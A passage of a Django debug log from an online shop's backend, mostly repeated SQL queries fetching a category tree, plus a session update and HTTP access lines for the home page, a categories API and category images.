"auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:14:45,080 utils 2749 140297222735616 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:14:45,089 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:14:45.087251+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 14, 45, 87251, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:14:45] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:14:49,946 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:14:49,956 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:14:49,960 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:14:49,963 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:14:49,969 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:14:49,973 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:14:49,977 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:14:49,981 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:14:49,986 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:14:49,994 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:14:49,998 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:14:50,003 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:14:50,009 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:14:50,013 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:14:50,019 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:14:50,023 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:14:50,027 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:14:50,031 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:14:50,036 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:14:50,042 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:14:50,046 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:14:50,050 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:14:50,054 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:14:50,058 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:14:50,062 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:14:50,069 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:14:50,073 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:14:50,077 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:14:50,081 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:14:50,085 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:14:50,092 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:14:50,096 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:14:50,100 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:14:50,103 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:14:50,105 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:14:50,109 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:14:50,111 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:14:50,115 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:14:50,118 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:14:50,121 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:14:50,123 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:14:50,126 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:14:50,130 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:14:50,134 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:14:50,137 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:14:50,141 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:14:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:14:50] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [31/Dec/2019 21:14:50] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-31 21:15:00,477 utils 2749 140297222735616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:15:00,490 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:15:00,497 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:15:00,501 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:15:00,507 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:15:00,511 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:15:00,515 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:15:00,519 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:15:00,523 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:15:00,529 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:15:00,533 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:15:00,537 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:15:00,541 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:15:00,545 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:15:00,550 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:15:00,554 utils 2749 